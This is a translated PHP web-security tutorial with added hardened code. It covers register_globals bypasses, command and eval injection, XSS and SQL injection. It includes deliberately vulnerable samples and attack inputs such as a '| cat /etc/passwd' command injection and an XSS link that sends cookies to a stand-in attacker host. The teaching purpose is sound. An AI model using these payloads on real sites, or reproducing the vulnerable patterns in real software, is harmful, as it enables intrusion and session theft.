PHP vulnerability full solution-vulnerability warning-the black bar safety net

2009-11-29T00:00:00
ID MYHACK58:62200925441
Type myhack58
Reporter Anonymous (佚名)
Modified 2009-11-29T00:00:00

Description

PHP web page security issues

PHP websites are mainly exposed to the following types of attack:

1. Command injection (Command Injection)
2. eval injection (Eval Injection)
3. Client-side script insertion (Script Insertion)
4. Cross-site scripting (Cross Site Scripting, XSS)
5. SQL injection (SQL Injection)
6. Cross-site request forgery (Cross Site Request Forgeries, CSRF)
7. Session hijacking (Session Hijacking)
8. Session fixation (Session Fixation)
9. HTTP response splitting (HTTP Response Splitting)
10. File upload vulnerabilities (File Upload Attack)
11. Directory traversal (Directory Traversal)
12. Remote file inclusion (Remote Inclusion)
13. Dynamic function injection (Dynamic Variable Evaluation)
14. URL attacks (URL attack)
15. Spoofed form submissions (Spoofed Form Submissions)
16. Spoofed HTTP requests (Spoofed HTTP Requests)

Several important php.ini options

Register Globals

Since PHP 4.2.0 the register_globals option in php.ini defaults to Off. When register_globals is On, the program receives all kinds of variables from the server as ordinary global variables, including the variables submitted by a form; because PHP does not require a variable to be initialized before it is used, this creates a serious security risk.

Example 1: check_admin() checks the current user's permissions. If the user is an administrator, $is_admin is set to true; the code then tests whether that variable is true and, if so, performs some management operation.

```php
// ex1.php
<?php
if (check_admin()) {
    $is_admin = true;
}
if ($is_admin) {
    do_something();
}
?>
```

This code never initializes $is_admin to false beforehand. If register_globals is On, submitting http://www.sectop.com/ex1.php?is_admin=true bypasses the check_admin() validation.

Example 2:

```php
// ex2.php
<?php
if (isset($_SESSION["username"])) {
    do_something();
} else {
    echo "You are not logged in!";
}
?>
```

When register_globals=On, submitting http://www.sectop.com/ex2.php?_SESSION[username]=dodo grants the attacker that user's permissions. So whatever the value of register_globals, remember that all transmitted data must be carefully validated and every variable must be initialized.
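The two examples above, rewritten defensively, as an added example that is not part of the original article. It initializes every variable before use, reads the session only after session_start() has populated $_SESSION from the server-side store, and adds a helper that undoes register_globals on hosts where it is still On (the option was removed in PHP 5.4, so on current PHP the helper is a no-op). check_admin() and do_something() are assumed to exist as in the article.

```php
<?php
// Added example (not from the original article): hardened ex1.php / ex2.php.

// Remove any global variable whose name matches a request key, so request data
// can never pre-seed a local variable. Does nothing when register_globals is Off.
function unregister_globals()
{
    if (!ini_get('register_globals')) {
        return; // Off, or absent: register_globals was removed in PHP 5.4
    }
    // The superglobals themselves must never be unset.
    $protected = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                       '_SERVER', '_ENV', '_FILES', '_SESSION');
    $input = array_merge($_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES);
    foreach (array_keys($input) as $key) {
        if (!in_array($key, $protected, true) && isset($GLOBALS[$key])) {
            unset($GLOBALS[$key]);
        }
    }
}

// Hardened ex1.php: the flag is always initialized, so the only way it becomes
// true is through check_admin().
function admin_page()
{
    $is_admin = false;
    if (check_admin()) {
        $is_admin = true;
    }
    if ($is_admin) {
        do_something();
    }
}

// Hardened ex2.php: session_start() initializes $_SESSION from the session
// store, so a "_SESSION[username]" request parameter cannot stand in for a login.
function member_page()
{
    session_start();
    if (isset($_SESSION['username']) && is_string($_SESSION['username'])
        && $_SESSION['username'] !== '') {
        do_something();
    } else {
        echo "You are not logged in!";
    }
}

// Call the cleanup before any other code runs, e.g. from a shared include.
unregister_globals();
```

The helper mirrors the pattern several large PHP applications used during the register_globals era; the real fix remains register_globals = Off in php.ini, with the explicit initialization in admin_page() as defence in depth.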

safe_mode

Safe mode is used by PHP to restrict file access, restrict access to environment variables, and control the execution of external programs. To enable safe mode, set in php.ini:

safe_mode = On

1. Restricting file access

safe_mode_include_dir = "/path1:/path2:/path3"

Different directories are separated by a colon.

2. Restricting access to environment variables

safe_mode_allowed_env_vars = string

Specifies the prefixes of the environment variables that the PHP program may change, for example safe_mode_allowed_env_vars = PHP_. When this option is empty, PHP may change any environment variable.

safe_mode_protected_env_vars = string

Specifies the prefixes of the environment variables that the PHP program may not change.

3. Restricting external program execution

safe_mode_exec_dir = string

This option specifies the directory from which programs may be executed. It affects system, exec, popen and passthru, but does not affect shell_exec or the backtick operator ``.

disable_functions = string

Function names are separated by commas. This option is independent of safe mode and takes effect regardless of it.

Magic quotes

Magic quotes make PHP automatically escape single quotes ('), double quotes ("), backslashes (\) and NUL characters in input data by prefixing each of them with a backslash.

magic_quotes_gpc = On

turns magic quotes on; it affects HTTP request data (GET, POST and cookies). The programmer can also use addslashes to escape submitted HTTP request data, and stripslashes to remove the escaping.
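An added example, not from the original article, of how code written for the magic_quotes_gpc setting described above is normally kept portable: the backslashes that magic quotes add are stripped once, centrally, so application code always sees the raw submitted value and escapes it itself at the point of use. The sample values are constructed; get_magic_quotes_gpc() was removed in PHP 8, hence the function_exists() guard.

```php
<?php
// Added example (not from the original article): normalizing magic-quoted input.

// Recursively remove the backslashes that magic_quotes_gpc inserted.
function strip_magic_quotes($value)
{
    if (is_array($value)) {
        return array_map('strip_magic_quotes', $value);
    }
    return is_string($value) ? stripslashes($value) : $value;
}

// Only strip when magic quotes are actually active; stripping unconditionally
// would corrupt legitimately submitted backslashes on a sane configuration.
function normalize_request_input()
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $_GET    = strip_magic_quotes($_GET);
        $_POST   = strip_magic_quotes($_POST);
        $_COOKIE = strip_magic_quotes($_COOKIE);
    }
}

// Constructed value as magic_quotes_gpc=On would deliver "O'Brien" in $_GET.
$as_received = "O\\'Brien";
$raw = strip_magic_quotes($as_received);

// Escape deliberately for each destination instead of relying on the
// transport layer: addslashes for the legacy quoting scheme the article
// describes, htmlspecialchars for HTML output.
$for_legacy_sql = addslashes($raw);
$for_html       = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');

normalize_request_input();
```

Running normalize_request_input() once at the top of every request (for example from a common include) means the rest of the application behaves identically whether magic_quotes_gpc is On or Off.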

Command injection attacks

In PHP, the following five functions can be used to execute an external program: system, exec, passthru, shell_exec and the backtick operator `` (which behaves the same as shell_exec).

Function prototypes:

string system(string command, int &return_var)
    command     the command to execute
    return_var  receives the exit status after the command has run

string exec(string command, array &output, int &return_var)
    command     the command to execute
    output      receives each line of the command's output as a string
    return_var  receives the exit status after the command has run

void passthru(string command, int &return_var)
    command     the command to execute
    return_var  receives the exit status after the command has run

string shell_exec(string command)
    command     the command to execute

Vulnerability example

Example 1:

```php
// ex1.php
<?php
$dir = $_GET["dir"];
if (isset($dir)) {
    echo "<pre>";
    system("ls -al " . $dir);
    echo "</pre>";
}
?>
```

Submitting http://www.sectop.com/ex1.php?dir=| cat /etc/passwd turns the executed command into system("ls -al | cat /etc/passwd");

eval injection attacks

The eval function executes its string argument as PHP code.

Function prototype: mixed eval(string code_str)

eval injection generally occurs when the attacker can control the string passed in.

```php
// ex2.php
<?php
$var = "var";
if (isset($_GET["arg"])) {
    $arg = $_GET["arg"];
    eval("\$var = $arg;");
    echo "\$var = " . $var;
}
?>
```

Submitting http://www.sectop.com/ex2.php?arg=phpinfo() triggers the vulnerability.

Dynamic functions

```php
<?php
function A() { dosomething(); }
function B() { dosomething(); }
if (isset($_GET["func"])) {
    $myfunc = $_GET["func"];
    echo $myfunc();
}
?>
```

The programmer intends to call A or B dynamically, but submitting http://www.sectop.com/ex.php?func=phpinfo triggers the vulnerability.
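The two pages above rewritten so that request input can select behaviour but is never itself interpreted as code, as an added example that is not part of the original article. A() and B() stand in for the article's handlers (their bodies are constructed); the pattern in assign_from_request() is an assumption about what ex2.php meant to accept, since the article does not say.

```php
<?php
// Added example (not from the original article): allowlisted dispatch instead
// of eval() and variable functions.

function A() { return "handler A ran"; }
function B() { return "handler B ran"; }

// The only names that may ever be dispatched to. Anything else is refused;
// there is deliberately no fallback to calling $name() directly.
function dispatch($name)
{
    $handlers = array(
        'A' => 'A',
        'B' => 'B',
    );
    if (!is_string($name) || !array_key_exists($name, $handlers)) {
        return null;
    }
    return call_user_func($handlers[$name]);
}

// Replacement for eval("\$var = $arg;"): parse the value with a strict pattern
// and convert it yourself. Here a plain integer literal is assumed to be what
// the page wanted; widen the pattern only for formats you actually need.
function assign_from_request($arg)
{
    if (!is_string($arg) || !preg_match('/^-?\d{1,9}$/', $arg)) {
        return null;
    }
    return (int) $arg;
}

// Usage in ex.php / ex2.php:
$func = isset($_GET['func']) ? $_GET['func'] : '';
$result = dispatch($func);
echo $result === null ? "unknown function" : $result;

$arg = isset($_GET['arg']) ? $_GET['arg'] : '';
$var = assign_from_request($arg);
echo $var === null ? "invalid argument" : "\$var = " . $var;
```

With this structure a value such as the article's phpinfo is simply an unknown key in $handlers and produces "unknown function"; it never reaches eval() or a variable-function call.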

Prevention methods

1. Avoid executing external commands where possible.
2. Use a custom function or a function library instead of the external command functions.
3. Use the escapeshellarg function to process command parameters.
4. Use safe_mode_exec_dir to specify the path to the executables.

The escapeshellarg function escapes any character in the parameter that could terminate the parameter or the command: a single quote ' is replaced with \', a double quote " with \", and a semicolon ; with \;.

safe_mode_exec_dir specifies the path to the executables; the commands that will be needed can be placed in that path in advance:

safe_mode = On
safe_mode_exec_dir = /usr/local/php/bin/
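The vulnerable ex1.php from the command injection section, rewritten along the lines of prevention methods 3 and 4, as an added example that is not part of the original article. escapeshellarg() in fact wraps the whole value in single quotes and escapes any embedded single quotes, which is what makes shell metacharacters in the value inert; the example also validates the value against an allowlist pattern before it gets near the shell and anchors it under a fixed base directory. The base directory /var/www/public and the absolute path /bin/ls are constructed placeholders.

```php
<?php
// Added example (not from the original article): hardened directory listing.

// Build the command line for listing $dir, or return null if $dir is not acceptable.
function build_listing_command($dir, $base = '/var/www/public')
{
    // 1. Allowlist validation: only short, simple relative path characters.
    if (!is_string($dir) || !preg_match('#^[A-Za-z0-9_./-]{1,128}$#', $dir)) {
        return null;
    }
    // 2. The pattern permits dots, so reject traversal segments explicitly.
    foreach (explode('/', $dir) as $segment) {
        if ($segment === '..') {
            return null;
        }
    }
    // 3. Anchor under a fixed base directory, use an absolute program path,
    //    and pass the value as a single quoted argument. "--" stops ls from
    //    treating a value beginning with "-" as an option.
    $target = rtrim($base, '/') . '/' . $dir;
    return '/bin/ls -al -- ' . escapeshellarg($target);
}

// Run the listing and return HTML that is safe to embed in the page.
function list_directory($dir)
{
    $cmd = build_listing_command($dir);
    if ($cmd === null) {
        return "invalid directory";
    }
    $output = array();
    $status = 0;
    exec($cmd, $output, $status);
    if ($status !== 0) {
        return "listing failed";
    }
    // 4. Command output is untrusted too: encode it before placing it in HTML.
    return "<pre>" . htmlspecialchars(implode("\n", $output), ENT_QUOTES, 'UTF-8') . "</pre>";
}

// ex1.php becomes:
$dir = isset($_GET['dir']) ? $_GET['dir'] : '';
echo list_directory($dir);
```

The article's "| cat /etc/passwd" value fails the allowlist pattern at step 1 and is never executed; even a value that passes the pattern reaches the shell only as one quoted argument to a fixed program, so the command line itself cannot be changed by the request.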

Client-side script insertion

Client-side script insertion (Script Insertion) means inserting executable script into objects such as forms, pictures, animations or hyperlink text. When a user opens these objects, the script the attacker planted is executed, and the attack begins. The HTML tags that can be used to plant a script generally include the following:

1. The <script> tag. It marks a page script such as JavaScript or VBScript. The <script> tag can carry the script code itself, or its src attribute can point to the URL of a script file.
2. The <object> tag and its objects. These are Java applets, multimedia files, ActiveX controls and so on; the object's URL is usually given in the data attribute.
3. The <embed> tag and its objects. These are multimedia files such as swf files; the object's URL is usually given in the src attribute.
4. The <applet> tag and its objects. These are Java applets; the object's URL is usually given in the codebase attribute.
5. The <form> tag and its objects. The action attribute usually specifies the URL of the web application that handles the form data.

Steps of a client-side script insertion attack

1. The attacker registers an ordinary user account and logs in to the website.
2. The attacker opens the message page and inserts the attacking JS code.
3. Other users (including the administrator) log in to the website and browse the message content.
4. The JS code hidden in the message content is executed, and the attack succeeds.

Example

Database:

```sql
CREATE TABLE postmessage (
  id int(11) NOT NULL auto_increment,
  subject varchar(60) NOT NULL default '',
  name varchar(40) NOT NULL default '',
  email varchar(25) NOT NULL default '',
  question mediumtext NOT NULL,
  postdate datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY (id)
) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT='user comment' AUTO_INCREMENT=69;
```

add.php inserts a message, list.php lists the messages, and show.php displays a message; the JS script runs when the message is browsed. Inserting <script>while(1){window.open();}</script> opens an unlimited number of pop-up windows, and inserting <script>location.href="http://www.sectop.com";</script> jumps to a phishing page. Attackers can also construct their own JS code for the attack.

Prevention method

Generally the htmlspecialchars function is used to convert special characters into HTML entities.

Function prototype: string htmlspecialchars(string string, int quote_style, string charset)

string       the string to encode
quote_style  optional; may be ENT_COMPAT, ENT_QUOTES or ENT_NOQUOTES. The default, ENT_COMPAT, converts only double quotes and leaves single quotes alone; ENT_QUOTES converts both double and single quotes; ENT_NOQUOTES converts neither.
charset      optional; the character set to use.

The function converts the following special characters into HTML entities:

& ----> &amp;
" ----> &quot;
' ----> &#039;
< ----> &lt;
> ----> &gt;

Line 98 of show.php is changed to

```php
<?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?>
```

Then view the page into which the JS was inserted again.

Cross-site scripting attacks

XSS (Cross Site Scripting) means cross-site scripting attacks; to distinguish it from cascading style sheets (CSS), it is abbreviated XSS. Cross-site scripting is mainly exploited by attackers to read the cookies or other personal data of the website's users; once the attacker has obtained this data, he can masquerade as that user to log in to the website and obtain that user's permissions.

The general steps of a cross-site scripting attack:

1. The attacker sends the XSS HTTP link to the target user by some means.
2. The target user logs in to the website and, while logged in, opens the XSS link sent by the attacker.
3. The website executes this XSS attack script.
4. The target user's page jumps to the attacker's website, and the attacker obtains the target user's information.
5. The attacker uses the target user's login information on the website, completing the attack.

When a program with a cross-site vulnerability exists, the attacker can construct a link such as

http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script>

and trick the user into clicking on it, obtaining the user's cookie value.

Prevention methods: use the htmlspecialchars function to convert special characters into HTML entities, exactly as described above for script insertion.

Cross-site scripting through the $_SERVER["PHP_SELF"] variable

In a form that submits to itself, a statement such as

```php
<form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="POST">
......
</form>
```

is used; the value of $_SERVER["PHP_SELF"] is the name of the current page.

Example: http://www.sectop.com/get.php, where get.php contains the form above. Submitting

http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>

turns the form into

```html
<form action="get.php/"><script>alert(document.cookie);</script>" method="POST">
```

and the cross-site script is inserted.

Defense: either filter the output of the variable with htmlspecialchars, or, for a form that submits to its own file, use

```html
<form action="" method="post">
```

which avoids the $_SERVER["PHP_SELF"] cross-site problem directly.
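One output-encoding helper applied at every point where untrusted data reaches HTML, covering the three cases discussed above (the stored message in show.php, the reflected search term in search.php, and the PHP_SELF form action), as an added example that is not part of the original article. The file and column names follow the article; the helper name e(), the search.php markup and the sample values are constructed. Note that the article's fix encodes after nl2br(), which also turns nl2br's own <br /> tags into literal text; encoding first and then calling nl2br() keeps the line breaks.

```php
<?php
// Added example (not from the original article): consistent HTML output encoding.

// Encode a value for an HTML text node or attribute value. ENT_QUOTES also
// encodes the single quote, so the result is safe inside single-quoted
// attributes; the charset is named explicitly rather than left to php.ini.
function e($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// show.php: encode first, then add <br /> for line breaks.
function render_question($question)
{
    return nl2br(e($question));
}

// search.php: reflect the search term only in encoded form.
function render_search_term($key)
{
    return "<p>Results for: " . e($key) . "</p>";
}

// Self-submitting form: an encoded PHP_SELF, or simply an empty action.
function render_form_tag($php_self, $use_empty_action = false)
{
    $action = $use_empty_action ? '' : e($php_self);
    return '<form action="' . $action . '" method="post">';
}

// Constructed inputs modelled on the article's payloads.
$stored_message = "hello\n<script>location.href=\"http://www.sectop.com\";</script>";
$search_term    = "<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script>";
$php_self       = '/get.php/"><script>alert(document.cookie);</script>';

echo render_question($stored_message), "\n";
echo render_search_term($search_term), "\n";
echo render_form_tag($php_self), "\n";
echo render_form_tag($php_self, true), "\n";
```

In each case the angle brackets and quotes of the injected markup come out as &lt;, &gt;, &quot; and &#039;, so the browser renders the payload as text and the attribute in the form tag cannot be closed early. The same e() helper is the right tool for the command output in the earlier listing example and for any other value that is echoed into a page.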

SQL injection attacks

In a SQL injection attack (SQL Injection) the attacker submits carefully constructed SQL in a form, altering the original SQL statement; if the web program does not check the submitted data, this leads to a SQL injection attack.

The general steps of a SQL injection attack:

1. The attacker visits a website with a SQL injection vulnerability and looks for an injection point.
2. The attacker constructs an injection statement, which is combined with the SQL statement in the program to generate a new SQL statement.
3. The new SQL statement is submitted to the database for processing.
4. The database executes the new SQL statement, triggering the SQL injection attack.
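The lookup that show.php and the insert that add.php would perform on the article's postmessage table, written first in the concatenating style that step 2 above relies on and then with prepared statements, where request data can only ever be bound as a value and never becomes part of the statement text. This is an added example, not code from the original article; the PDO connection details are placeholders, and the length limits are taken from the article's column definitions.

```php
<?php
// Added example (not from the original article): parameterized access to postmessage.

function connect()
{
    $pdo = new PDO('mysql:host=localhost;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
                   'DB_USER_PLACEHOLDER', 'DB_PASSWORD_PLACEHOLDER');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Real server-side prepares: the statement text is fixed before any value is sent.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// Shape of the problem (do not use): the request value is pasted into the SQL text,
// so whatever it contains becomes part of the statement the database executes.
function fetch_message_unsafe(PDO $pdo, $id)
{
    $sql = "SELECT subject, name, question FROM postmessage WHERE id = " . $id;
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened show.php lookup: check the type, then bind the value as a parameter.
function fetch_message(PDO $pdo, $id)
{
    if (!is_string($id) && !is_int($id)) {
        return null;
    }
    if (!preg_match('/^\d{1,10}$/', (string) $id)) {
        return null; // ids are positive integers; anything else is rejected outright
    }
    $stmt = $pdo->prepare("SELECT subject, name, question FROM postmessage WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened add.php insert: bound values are stored literally, including quotes,
// with no addslashes or magic_quotes escaping involved.
function add_message(PDO $pdo, $subject, $name, $email, $question)
{
    $stmt = $pdo->prepare(
        "INSERT INTO postmessage (subject, name, email, question, postdate)
         VALUES (:subject, :name, :email, :question, NOW())"
    );
    $stmt->execute(array(
        ':subject'  => mb_substr((string) $subject, 0, 60),
        ':name'     => mb_substr((string) $name, 0, 40),
        ':email'    => mb_substr((string) $email, 0, 25),
        ':question' => (string) $question,
    ));
    return (int) $pdo->lastInsertId();
}

// Usage in show.php:
// $row = fetch_message(connect(), isset($_GET['id']) ? $_GET['id'] : '');
// if ($row === null) { echo "no such message"; }
```

The validation in fetch_message() is a second line of defence rather than the primary one: even without it, a bound parameter cannot alter the statement, which is what removes step 2 of the attack. Output of the fetched row still needs the htmlspecialchars encoding from the script insertion section, since parameterization protects the database, not the page.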